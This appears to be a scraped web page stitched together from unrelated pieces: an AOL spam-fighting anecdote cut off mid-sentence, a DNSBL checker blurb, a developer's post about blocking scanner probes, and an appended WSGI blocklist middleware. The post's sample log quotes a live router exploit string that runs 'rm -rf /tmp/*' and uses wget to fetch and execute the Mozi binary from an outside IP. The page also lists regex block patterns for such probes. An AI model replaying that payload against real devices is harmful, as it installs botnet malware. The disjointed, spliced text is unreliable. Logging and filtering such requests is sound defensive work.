2/1/2022

My Ip Blacklist

Hear me out.

How To Blacklist Your Ip

IP address reputation-based blocking was a concept that we saw back in the mid-90s when I was fighting spam as the Senior Internet Mail Administrator at AOL. It worked okay, for a while. It quickly became a game of cat-and-mouse, where some spammers wouldn’t care that we blocked them, but plenty of others found various ways around the blocks we.

Blacklist Check. The XMyIP blacklist checker shows if an IP address or domain is listed with public DNSBL systems. We check over 50 DNS-based anti-spam databases. DNSBL stands for Domain Name System-based Blackhole List.

I've recently started logging pings to my services. A LOT of servers ping me constantly, checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this:

[
  {"offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164"},
  {"offense": ".env", "ipAddress": "52.224.55.198"},
  {"offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.115.18:53153/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "ipAddress": "115.58.115.18"}
]

Maybe we don't filter by IP address, and instead filter requests based on known strings (or regex). That's what I'm currently doing. Ex.: if a request includes '.env', blocked!

I'd love to implement a more aggressive strategy, rather than a reactive one. I'm currently finding myself going through server logs and adding new 'keywords' to the 'banned list'.

Like an 'ad blocklist' we can use as middleware in our HTTP applications.

If something exists already, kindly point me to a GitHub.
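
The string/regex filter described in the post, sketched as WSGI middleware that normalizes the request target before matching, so an encoded probe such as `/%2Eenv` is caught as well as `/.env`. This is an added example, not code from the original post; the pattern list and the names `normalize`, `is_blocked` and `BlocklistMiddleware` are assumptions built from the three sample entries above.

```python
import re
from urllib.parse import unquote

# Assumed pattern list, derived from the three sample entries in the post.
# Extend it from your own logs. Matched against the normalized path + query.
BLOCK_PATTERNS = [
    r"(^|/)\.env(\.|$|[/?])",         # dotfile probes: /.env, /app/.env.bak
    r"(^|/)boaform/admin/formlogin",  # router login probe
    r"(^|/)setup\.cgi\?.*\bcmd=",     # command parameter passed to setup.cgi
]
BLOCK_RE = re.compile("|".join(f"(?:{p})" for p in BLOCK_PATTERNS), re.S)


def normalize(target: str) -> str:
    """Percent-decode twice (catches double encoding), lowercase, collapse slashes."""
    for _ in range(2):
        target = unquote(target)
    return re.sub(r"/{2,}", "/", target.lower())


def is_blocked(target: str) -> bool:
    """True if the normalized request target matches any blocklist pattern."""
    return BLOCK_RE.search(normalize(target)) is not None


class BlocklistMiddleware:
    """WSGI middleware: answer 403 before the wrapped app sees a blocked request."""

    def __init__(self, app, on_block=None):
        self.app = app
        self.on_block = on_block  # optional callback(ip, target), e.g. for logging

    def __call__(self, environ, start_response):
        # PATH_INFO is normally already decoded once; QUERY_STRING is raw.
        target = environ.get("PATH_INFO", "")
        if environ.get("QUERY_STRING"):
            target += "?" + environ["QUERY_STRING"]
        if is_blocked(target):
            if self.on_block:
                self.on_block(environ.get("REMOTE_ADDR", ""), target)
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"blocked\n"]
        return self.app(environ, start_response)
```

Anchoring each pattern to a path segment keeps `/environment` and `/index.html?q=env` from tripping the `.env` rule, which a plain substring check would block.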